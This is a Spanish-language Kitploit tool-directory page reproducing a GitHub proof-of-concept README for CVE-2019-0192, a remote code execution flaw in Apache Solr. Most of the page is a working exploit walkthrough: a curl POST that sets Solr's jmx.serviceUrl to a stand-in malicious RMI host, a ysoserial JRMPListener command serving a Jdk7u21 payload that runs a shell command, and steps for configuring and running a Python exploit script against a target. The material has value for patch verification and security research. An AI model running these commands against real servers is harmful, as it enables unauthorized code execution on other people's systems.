Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-0192 — RCE en Apache Solr usando deserialización de datos no confiables a través de jmx.serviceUrl | Kitploit
Herramientas/GitHubGitHub/mpgn/cve-2019-0192
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubmpgn/cve-2019-0192

CVE-2019-0192

RCE en Apache Solr usando deserialización de datos no confiables a través de jmx.serviceUrl

Ver Repositorio
20855hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-0192 - Apache Solr RCE 5.0.0 a 5.5.5 y 6.0.0 a 6.6.5

Este es una PoC temprana de la RCE de Apache Solr

De https://issues.apache.org/jira/browse/SOLR-13301:

ConfigAPI permite configurar el servidor JMX de Solr mediante una solicitud HTTP POST. Al apuntarlo a un servidor RMI malicioso, un atacante podría aprovechar la deserialización insegura de Solr para ejecutar código remoto en el lado de Solr.

Prueba de concepto

image


Al observar la descripción del aviso de seguridad y revisar los recursos de ConfigAPI de Apache Solr, podemos encontrar una referencia a un servidor JMX:

image

serviceUrl - (str opcional) URL de servicio para un servidor JMX. Si no se especifica, se usará el servidor MBean de plataforma predeterminado.

Al verificar cómo funciona ConfigAPI, podemos reproducir cómo configurar un servidor JMX remoto:

root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

Para la PoC usaré yoserial para crear un servidor RMI malicioso usando el payload Jdk7u21

  1. Iniciar el servidor RMI malicioso:
root@kitploit:~
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/pwn.txt"
  1. Ejecutar la solicitud POST:
root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

nota: deberías obtener un error 500 con un bonito stacktrace

  1. Revisar el stacktrace:
  • Si viste este error: "Non-annotation type in annotation serial stream" significa que Apache Solr se está ejecutando con una versión de Java > JRE 7u25 y esta PoC no funcionará

  • De lo contrario, deberías ver este error: "undeclared checked exception; nested exception is" y la PoC debería funcionar.

Exploit

  1. Descargar yoserial : https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
  2. Cambiar los valores en el script:
root@kitploit:~
remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"
RPORT = "1099"
  1. Luego ejecutar el script:
root@kitploit:~
python3 CVE-2019-0192.py

Aviso de seguridad:

  • http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E

Recursos:

  • https://lucene.apache.org/solr/guide/6_6/config-api.html#ConfigAPI-CommandsforCommonProperties
  • https://issues.apache.org/jira/browse/SOLR-13301
Descargar herramienta